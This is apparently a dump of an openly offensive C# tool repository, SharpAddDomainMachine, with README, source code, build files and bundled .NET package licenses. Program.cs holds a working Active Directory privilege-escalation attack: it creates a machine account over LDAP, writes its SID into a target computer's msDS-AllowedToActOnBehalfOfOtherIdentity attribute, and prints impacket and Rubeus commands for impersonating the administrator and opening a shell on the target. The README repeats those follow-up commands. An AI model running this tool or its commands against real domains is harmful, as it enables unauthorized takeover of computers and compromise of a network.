├── .vs
└── SharpAddDomainMachine
│ └── v14
│ └── .suo
├── README.md
├── SharpAddDomainMachine.sln
├── SharpAddDomainMachine
├── App.config
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── SharpAddDomainMachine.csproj
├── SharpAddDomainMachine.csproj.user
└── packages.config
└── packages
├── System.DirectoryServices.4.7.0
├── .signature.p7s
├── LICENSE.TXT
├── System.DirectoryServices.4.7.0.nupkg
├── THIRD-PARTY-NOTICES.TXT
├── lib
│ ├── net45
│ │ └── _._
│ └── netstandard2.0
│ │ ├── System.DirectoryServices.dll
│ │ └── System.DirectoryServices.xml
├── ref
│ ├── net45
│ │ └── _._
│ └── netstandard2.0
│ │ ├── System.DirectoryServices.dll
│ │ └── System.DirectoryServices.xml
├── runtimes
│ └── win
│ │ └── lib
│ │ ├── net45
│ │ └── _._
│ │ └── netcoreapp2.0
│ │ ├── System.DirectoryServices.dll
│ │ └── System.DirectoryServices.xml
├── useSharedDesignerContext.txt
└── version.txt
└── System.DirectoryServices.Protocols.4.7.0
├── .signature.p7s
├── LICENSE.TXT
├── System.DirectoryServices.Protocols.4.7.0.nupkg
├── THIRD-PARTY-NOTICES.TXT
├── lib
├── net45
│ └── _._
└── netstandard2.0
│ ├── System.DirectoryServices.Protocols.dll
│ └── System.DirectoryServices.Protocols.xml
├── ref
├── net45
│ └── _._
└── netstandard2.0
│ ├── System.DirectoryServices.Protocols.dll
│ └── System.DirectoryServices.Protocols.xml
├── runtimes
└── win
│ └── lib
│ ├── net45
│ └── _._
│ └── netcoreapp2.0
│ ├── System.DirectoryServices.Protocols.dll
│ └── System.DirectoryServices.Protocols.xml
├── useSharedDesignerContext.txt
└── version.txt
/.vs/SharpAddDomainMachine/v14/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/.vs/SharpAddDomainMachine/v14/.suo
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # SharpAddDomainMachine
2 | ## Description
3 | The same script as [SharpAllowedToAct](https://github.com/pkb1s/SharpAllowedToAct), but more usefully for local privilege escalation.
4 |
5 | ## Usage
6 | ```
7 | SharpAddDomainMachine
8 |
9 | SharpAddDomainMachine.exe domain=domain.com dc=192.168.1.1 tm=target_machine_name ma=machine_account mp=machine_pass
10 |
11 | domain: Set the target domain.
12 | dc: Set the domain controller to use.
13 | tm: Set the name of the target computer you want to exploit. Need to have write access to the computer object.
14 | ma: Set the name of the new machine.(default:random)
15 | mp: Set the password for the new machine.(default:random)
16 | ```
17 |
18 | After successful attack use impacket to get system:
19 | ```
20 | getST.py -dc-ip dc_ip domain.com/ma:mp -spn cifs/tm.domain -impersonate administrator
21 | export KRB5CCNAME=administrator.ccache
22 | psexec.py domain/administrator@tm.domain -k -no-pass
23 | ```
24 |
25 | exploit:
26 | 
27 |
28 | getsystem:
29 | 
30 |
31 | Rubeus example:
32 | 
--------------------------------------------------------------------------------
/SharpAddDomainMachine.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.25420.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpAddDomainMachine", "SharpAddDomainMachine\SharpAddDomainMachine.csproj", "{EBFA4A39-5B89-4782-9511-190DDFA241E8}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {EBFA4A39-5B89-4782-9511-190DDFA241E8}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {EBFA4A39-5B89-4782-9511-190DDFA241E8}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {EBFA4A39-5B89-4782-9511-190DDFA241E8}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {EBFA4A39-5B89-4782-9511-190DDFA241E8}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | EndGlobal
23 |
--------------------------------------------------------------------------------
/SharpAddDomainMachine/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/SharpAddDomainMachine/Program.cs:
--------------------------------------------------------------------------------
1 | /*
2 | This code can be complied by csc.exe or Visual Studio.
3 | Supprot.Net 3.5 or later.
4 | Complie:
5 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe Program.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll
6 | or
7 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Program.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll
8 | */
9 | using System;
10 | using System.Text;
11 | using System.Security.AccessControl;
12 | using System.Security.Principal;
13 | using System.Net;
14 | using System.Collections.Generic;
15 | using System.Linq;
16 | using System.DirectoryServices.Protocols;
17 |
18 | namespace SharpAddDomainMachine
19 | {
20 | class Program
21 | {
22 |
23 | static void Usage()
24 | {
25 | Console.WriteLine("\nSharpAddDomainMachine\r\n");
26 | Console.WriteLine("SharpAddDomainMachine.exe domain=domain.com dc=192.168.1.1 tm=target_machine_name ma=machine_account mp=machine_pass\n");
27 | Console.WriteLine("domain:\tSet the target domain.\ndc:\tSet the domain controller to use.\ntm:\tSet the name of the target computer you want to exploit. Need to have write access to the computer object.\nma:\tSet the name of the new machine.(default:random)\nmp:\tSet the password for the new machine.(default:random)\n");
28 | }
29 | private static Random random = new Random();
30 | public static string RandomString(int length)
31 | {
32 | const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
33 | return new string(Enumerable.Repeat(chars, length)
34 | .Select(s => s[random.Next(s.Length)]).ToArray());
35 | }
36 | static void Main(string[] args)
37 | {
38 | if (args.Length < 2)
39 | {
40 | Usage();
41 | return;
42 | }
43 | var arguments = new Dictionary();
44 | foreach (string argument in args)
45 | {
46 | int idx = argument.IndexOf('=');
47 | if (idx > 0)
48 | arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
49 | }
50 |
51 | if (!arguments.ContainsKey("domain") || !arguments.ContainsKey("dc") || !arguments.ContainsKey("tm"))
52 | {
53 | Usage();
54 | return;
55 | }
56 | String DomainController = arguments["dc"];
57 | String Domain = arguments["domain"];
58 | String new_MachineAccount = "";
59 | String new_MachineAccount_password = "";
60 | //添加的机器账户
61 | if (arguments.ContainsKey("ma")) {
62 | new_MachineAccount = arguments["ma"];
63 | }else
64 | {
65 | new_MachineAccount = RandomString(8);
66 | }
67 | //机器账户密码
68 | if (arguments.ContainsKey("ma"))
69 | {
70 | new_MachineAccount_password = arguments["mp"];
71 | }
72 | else
73 | {
74 | new_MachineAccount_password = RandomString(10);
75 | }
76 |
77 | String victimcomputer = arguments["tm"]; ; //需要进行提权的机器
78 | String machine_account = new_MachineAccount;
79 | String sam_account = "";
80 | String DistinguishedName = "";
81 | if (machine_account.EndsWith("$"))
82 | {
83 | sam_account = machine_account;
84 | machine_account = machine_account.Substring(0, machine_account.Length - 1);
85 | }
86 | else
87 | {
88 | sam_account = machine_account + "$";
89 | }
90 | String distinguished_name = DistinguishedName;
91 | String victim_distinguished_name = DistinguishedName;
92 | String[] DC_array = null;
93 |
94 | distinguished_name = "CN=" + machine_account + ",CN=Computers";
95 | victim_distinguished_name = "CN=" + victimcomputer + ",CN=Computers";
96 | DC_array = Domain.Split('.');
97 |
98 | foreach (String DC in DC_array)
99 | {
100 | distinguished_name += ",DC=" + DC;
101 | victim_distinguished_name += ",DC=" + DC;
102 | }
103 | Console.WriteLine(victim_distinguished_name);
104 | Console.WriteLine("[+] Elevate permissions on " + victimcomputer);
105 | Console.WriteLine("[+] Domain = " + Domain);
106 | Console.WriteLine("[+] Domain Controller = " + DomainController);
107 | //Console.WriteLine("[+] Distinguished Name = " + distinguished_name);
108 | try{
109 | //连接ldap
110 | System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389);
111 | //NetworkCredential nc = new NetworkCredential(username, password); //使用凭据登录
112 | System.DirectoryServices.Protocols.LdapConnection connection = null;
113 | //connection = new System.DirectoryServices.Protocols.LdapConnection(identifier, nc);
114 | connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);
115 | connection.SessionOptions.Sealing = true;
116 | connection.SessionOptions.Signing = true;
117 | connection.Bind();
118 | //通过ldap找计算机
119 | System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry(Domain);
120 | myldapConnection.Path = "LDAP://" + victim_distinguished_name;
121 | myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure;
122 | System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection);
123 | search.Filter = "(CN=" + victimcomputer + ")";
124 | string[] requiredProperties = new string[] { "samaccountname" };
125 | foreach (String property in requiredProperties)
126 | search.PropertiesToLoad.Add(property);
127 | System.DirectoryServices.SearchResult result = null;
128 | try
129 | {
130 | result = search.FindOne();
131 | }
132 | catch (System.Exception ex)
133 | {
134 | Console.WriteLine("[!] " +ex.Message + "\n[-] Exiting...");
135 | return;
136 | }
137 |
138 | //添加机器并设置资源约束委派
139 | if (result != null)
140 | {
141 | try
142 | {
143 |
144 | var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
145 | new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account +"."+ Domain),
146 | new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
147 | new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
148 | new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + new_MachineAccount_password + "\"")),
149 | new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
150 | new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/"+machine_account+"."+Domain,"RestrictedKrbHost/"+machine_account+"."+Domain,"HOST/"+machine_account,"RestrictedKrbHost/"+machine_account)
151 | });
152 | //添加机器账户
153 | connection.SendRequest(request);
154 | Console.WriteLine("[+] New SAMAccountName = " + sam_account);
155 | Console.WriteLine("[+] Machine account: " + machine_account + " Password: " + new_MachineAccount_password + " added");
156 | }
157 | catch (System.Exception ex)
158 | {
159 | Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-new_MachineAccountQuota limit.)");
160 | Console.WriteLine("[-] Exception: " + ex.Message);
161 | return;
162 | }
163 | // 获取新计算机对象的SID
164 | var new_request = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null);
165 | var new_response = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request);
166 | SecurityIdentifier sid = null;
167 | foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries)
168 | {
169 | try
170 | {
171 | sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0);
172 | Console.Out.WriteLine("[+] " + new_MachineAccount + " SID : " + sid.Value);
173 | }
174 | catch
175 | {
176 | Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting...");
177 | return;
178 | }
179 | }
180 | //设置资源约束委派
181 | String sec_descriptor = @"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + sid.Value + ")";
182 | RawSecurityDescriptor sd = new RawSecurityDescriptor(sec_descriptor);
183 | byte[] buffer = new byte[sd.BinaryLength];
184 | sd.GetBinaryForm(buffer, 0);
185 | //测试sddl转换结果
186 | //RawSecurityDescriptor test_back = new RawSecurityDescriptor (buffer, 0);
187 | //Console.WriteLine(test_back.GetSddlForm(AccessControlSections.All));
188 | // 添加evilpc的sid到msds-allowedtoactonbehalfofotheridentity中
189 | try
190 | {
191 | var change_request = new System.DirectoryServices.Protocols.ModifyRequest();
192 | change_request.DistinguishedName = victim_distinguished_name;
193 | DirectoryAttributeModification modifymsDS = new DirectoryAttributeModification();
194 | modifymsDS.Operation = DirectoryAttributeOperation.Replace;
195 | modifymsDS.Name = "msDS-AllowedToActOnBehalfOfOtherIdentity";
196 | modifymsDS.Add(buffer);
197 | change_request.Modifications.Add(modifymsDS);
198 | connection.SendRequest(change_request);
199 | Console.WriteLine("[+] Exploit successfully!\n");
200 | //打印利用方式
201 | Console.WriteLine("[+] Use impacket to get priv!\n");
202 | Console.WriteLine("\ngetST.py -dc-ip {0} {1}/{2}$:{3} -spn cifs/{4}.{5} -impersonate administrator", DomainController, Domain, machine_account, new_MachineAccount_password, victimcomputer, Domain);
203 | Console.WriteLine("\nexport KRB5CCNAME=administrator.ccache");
204 | Console.WriteLine("\npsexec.py {0}/administrator@{1}.{2} -k -no-pass", Domain, victimcomputer, Domain);
205 | Console.WriteLine("\n\n[+] Use Rubeus.exe to get priv!\n");
206 | Console.WriteLine("\nRubeus.exe hash /user:{0} /password:{1} /domain:{2}", machine_account, new_MachineAccount_password, Domain);
207 | Console.WriteLine("\nRubeus.exe s4u /user:{0} /rc4:rc4_hmac /impersonateuser:administrator /msdsspn:cifs/{1}.{2} /ptt /dc:{3}", machine_account, victimcomputer, Domain, DomainController);
208 | Console.WriteLine("\npsexec.exe \\\\{0}.{1} cmd ", victimcomputer, Domain);
209 | Console.WriteLine("\n[+] Done..");
210 | }
211 | catch (System.Exception ex)
212 | {
213 | Console.WriteLine("[!] Error: " + ex.Message + " " + ex.InnerException);
214 | Console.WriteLine("[!] Failed...");
215 | return;
216 | }
217 |
218 | }
219 | }
220 | catch (System.Exception ex){
221 | Console.WriteLine("[!] "+ ex.Message + "\n[-] Exiting...");
222 | return;
223 | }
224 |
225 |
226 | }
227 | }
228 | }
--------------------------------------------------------------------------------
/SharpAddDomainMachine/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // 有关程序集的一般信息由以下
6 | // 控制。更改这些特性值可修改
7 | // 与程序集关联的信息。
8 | [assembly: AssemblyTitle("SharpAddDomainMachine")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("Microsoft")]
12 | [assembly: AssemblyProduct("SharpAddDomainMachine")]
13 | [assembly: AssemblyCopyright("Copyright © Microsoft 2020")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | //将 ComVisible 设置为 false 将使此程序集中的类型
18 | //对 COM 组件不可见。 如果需要从 COM 访问此程序集中的类型,
19 | //请将此类型的 ComVisible 特性设置为 true。
20 | [assembly: ComVisible(false)]
21 |
22 | // 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID
23 | [assembly: Guid("ebfa4a39-5b89-4782-9511-190ddfa241e8")]
24 |
25 | // 程序集的版本信息由下列四个值组成:
26 | //
27 | // 主版本
28 | // 次版本
29 | // 生成号
30 | // 修订号
31 | //
32 | //可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值,
33 | // 方法是按如下所示使用“*”: :
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/SharpAddDomainMachine/SharpAddDomainMachine.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {EBFA4A39-5B89-4782-9511-190DDFA241E8}
8 | Exe
9 | Properties
10 | SharpAddDomainMachine
11 | SharpAddDomainMachine
12 | v4.5
13 | 512
14 | true
15 |
16 |
17 |
18 | AnyCPU
19 | true
20 | full
21 | false
22 | bin\Debug\
23 | DEBUG;TRACE
24 | prompt
25 | 4
26 | false
27 |
28 |
29 | AnyCPU
30 | pdbonly
31 | true
32 | bin\Release\
33 | TRACE
34 | prompt
35 | 4
36 | false
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 | Designer
58 |
59 |
60 |
61 |
68 |
--------------------------------------------------------------------------------
/SharpAddDomainMachine/SharpAddDomainMachine.csproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | domain=cgdomain.com dc=lab2012.cgdomain.com tm=vswin7
5 |
6 |
--------------------------------------------------------------------------------
/SharpAddDomainMachine/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.4.7.0/.signature.p7s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/packages/System.DirectoryServices.4.7.0/.signature.p7s
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.4.7.0/LICENSE.TXT:
--------------------------------------------------------------------------------
1 | The MIT License (MIT)
2 |
3 | Copyright (c) .NET Foundation and Contributors
4 |
5 | All rights reserved.
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.4.7.0/System.DirectoryServices.4.7.0.nupkg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/packages/System.DirectoryServices.4.7.0/System.DirectoryServices.4.7.0.nupkg
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.4.7.0/THIRD-PARTY-NOTICES.TXT:
--------------------------------------------------------------------------------
1 | .NET Core uses third-party libraries or other resources that may be
2 | distributed under licenses different than the .NET Core software.
3 |
4 | In the event that we accidentally failed to list a required notice, please
5 | bring it to our attention. Post an issue or email us:
6 |
7 | dotnet@microsoft.com
8 |
9 | The attached notices are provided for information only.
10 |
11 | License notice for ASP.NET
12 | -------------------------------
13 |
14 | Copyright (c) .NET Foundation. All rights reserved.
15 | Licensed under the Apache License, Version 2.0.
16 |
17 | Available at
18 | https://github.com/aspnet/AspNetCore/blob/master/LICENSE.txt
19 |
20 | License notice for Slicing-by-8
21 | -------------------------------
22 |
23 | http://sourceforge.net/projects/slicing-by-8/
24 |
25 | Copyright (c) 2004-2006 Intel Corporation - All Rights Reserved
26 |
27 |
28 | This software program is licensed subject to the BSD License, available at
29 | http://www.opensource.org/licenses/bsd-license.html.
30 |
31 |
32 | License notice for Unicode data
33 | -------------------------------
34 |
35 | http://www.unicode.org/copyright.html#License
36 |
37 | Copyright © 1991-2017 Unicode, Inc. All rights reserved.
38 | Distributed under the Terms of Use in http://www.unicode.org/copyright.html.
39 |
40 | Permission is hereby granted, free of charge, to any person obtaining
41 | a copy of the Unicode data files and any associated documentation
42 | (the "Data Files") or Unicode software and any associated documentation
43 | (the "Software") to deal in the Data Files or Software
44 | without restriction, including without limitation the rights to use,
45 | copy, modify, merge, publish, distribute, and/or sell copies of
46 | the Data Files or Software, and to permit persons to whom the Data Files
47 | or Software are furnished to do so, provided that either
48 | (a) this copyright and permission notice appear with all copies
49 | of the Data Files or Software, or
50 | (b) this copyright and permission notice appear in associated
51 | Documentation.
52 |
53 | THE DATA FILES AND SOFTWARE ARE PROVIDED "AS IS", WITHOUT WARRANTY OF
54 | ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
55 | WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
56 | NONINFRINGEMENT OF THIRD PARTY RIGHTS.
57 | IN NO EVENT SHALL THE COPYRIGHT HOLDER OR HOLDERS INCLUDED IN THIS
58 | NOTICE BE LIABLE FOR ANY CLAIM, OR ANY SPECIAL INDIRECT OR CONSEQUENTIAL
59 | DAMAGES, OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE,
60 | DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER
61 | TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
62 | PERFORMANCE OF THE DATA FILES OR SOFTWARE.
63 |
64 | Except as contained in this notice, the name of a copyright holder
65 | shall not be used in advertising or otherwise to promote the sale,
66 | use or other dealings in these Data Files or Software without prior
67 | written authorization of the copyright holder.
68 |
69 | License notice for Zlib
70 | -----------------------
71 |
72 | https://github.com/madler/zlib
73 | http://zlib.net/zlib_license.html
74 |
75 | /* zlib.h -- interface of the 'zlib' general purpose compression library
76 | version 1.2.11, January 15th, 2017
77 |
78 | Copyright (C) 1995-2017 Jean-loup Gailly and Mark Adler
79 |
80 | This software is provided 'as-is', without any express or implied
81 | warranty. In no event will the authors be held liable for any damages
82 | arising from the use of this software.
83 |
84 | Permission is granted to anyone to use this software for any purpose,
85 | including commercial applications, and to alter it and redistribute it
86 | freely, subject to the following restrictions:
87 |
88 | 1. The origin of this software must not be misrepresented; you must not
89 | claim that you wrote the original software. If you use this software
90 | in a product, an acknowledgment in the product documentation would be
91 | appreciated but is not required.
92 | 2. Altered source versions must be plainly marked as such, and must not be
93 | misrepresented as being the original software.
94 | 3. This notice may not be removed or altered from any source distribution.
95 |
96 | Jean-loup Gailly Mark Adler
97 | jloup@gzip.org madler@alumni.caltech.edu
98 |
99 | */
100 |
101 | License notice for Mono
102 | -------------------------------
103 |
104 | http://www.mono-project.com/docs/about-mono/
105 |
106 | Copyright (c) .NET Foundation Contributors
107 |
108 | MIT License
109 |
110 | Permission is hereby granted, free of charge, to any person obtaining a copy
111 | of this software and associated documentation files (the Software), to deal
112 | in the Software without restriction, including without limitation the rights
113 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
114 | copies of the Software, and to permit persons to whom the Software is
115 | furnished to do so, subject to the following conditions:
116 |
117 | The above copyright notice and this permission notice shall be included in all
118 | copies or substantial portions of the Software.
119 |
120 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
121 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
122 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
123 | NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
124 | LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
125 | OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
126 | WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
127 |
128 | License notice for International Organization for Standardization
129 | -----------------------------------------------------------------
130 |
131 | Portions (C) International Organization for Standardization 1986:
132 | Permission to copy in any form is granted for use with
133 | conforming SGML systems and applications as defined in
134 | ISO 8879, provided this notice is included in all copies.
135 |
136 | License notice for Intel
137 | ------------------------
138 |
139 | "Copyright (c) 2004-2006 Intel Corporation - All Rights Reserved
140 |
141 | Redistribution and use in source and binary forms, with or without
142 | modification, are permitted provided that the following conditions are met:
143 |
144 | 1. Redistributions of source code must retain the above copyright notice, this
145 | list of conditions and the following disclaimer.
146 |
147 | 2. Redistributions in binary form must reproduce the above copyright notice,
148 | this list of conditions and the following disclaimer in the documentation
149 | and/or other materials provided with the distribution.
150 |
151 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
152 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
153 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
154 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
155 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
156 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
157 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
158 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
159 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
160 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
161 |
162 | License notice for Xamarin and Novell
163 | -------------------------------------
164 |
165 | Copyright (c) 2015 Xamarin, Inc (http://www.xamarin.com)
166 |
167 | Permission is hereby granted, free of charge, to any person obtaining a copy
168 | of this software and associated documentation files (the "Software"), to deal
169 | in the Software without restriction, including without limitation the rights
170 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
171 | copies of the Software, and to permit persons to whom the Software is
172 | furnished to do so, subject to the following conditions:
173 |
174 | The above copyright notice and this permission notice shall be included in
175 | all copies or substantial portions of the Software.
176 |
177 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
178 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
179 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
180 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
181 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
182 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
183 | THE SOFTWARE.
184 |
185 | Copyright (c) 2011 Novell, Inc (http://www.novell.com)
186 |
187 | Permission is hereby granted, free of charge, to any person obtaining a copy
188 | of this software and associated documentation files (the "Software"), to deal
189 | in the Software without restriction, including without limitation the rights
190 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
191 | copies of the Software, and to permit persons to whom the Software is
192 | furnished to do so, subject to the following conditions:
193 |
194 | The above copyright notice and this permission notice shall be included in
195 | all copies or substantial portions of the Software.
196 |
197 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
198 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
199 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
200 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
201 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
202 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
203 | THE SOFTWARE.
204 |
205 | Third party notice for W3C
206 | --------------------------
207 |
208 | "W3C SOFTWARE AND DOCUMENT NOTICE AND LICENSE
209 | Status: This license takes effect 13 May, 2015.
210 | This work is being provided by the copyright holders under the following license.
211 | License
212 | By obtaining and/or copying this work, you (the licensee) agree that you have read, understood, and will comply with the following terms and conditions.
213 | Permission to copy, modify, and distribute this work, with or without modification, for any purpose and without fee or royalty is hereby granted, provided that you include the following on ALL copies of the work or portions thereof, including modifications:
214 | The full text of this NOTICE in a location viewable to users of the redistributed or derivative work.
215 | Any pre-existing intellectual property disclaimers, notices, or terms and conditions. If none exist, the W3C Software and Document Short Notice should be included.
216 | Notice of any changes or modifications, through a copyright statement on the new code or document such as "This software or document includes material copied from or derived from [title and URI of the W3C document]. Copyright © [YEAR] W3C® (MIT, ERCIM, Keio, Beihang)."
217 | Disclaimers
218 | THIS WORK IS PROVIDED "AS IS," AND COPYRIGHT HOLDERS MAKE NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO, WARRANTIES OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF THE SOFTWARE OR DOCUMENT WILL NOT INFRINGE ANY THIRD PARTY PATENTS, COPYRIGHTS, TRADEMARKS OR OTHER RIGHTS.
219 | COPYRIGHT HOLDERS WILL NOT BE LIABLE FOR ANY DIRECT, INDIRECT, SPECIAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF ANY USE OF THE SOFTWARE OR DOCUMENT.
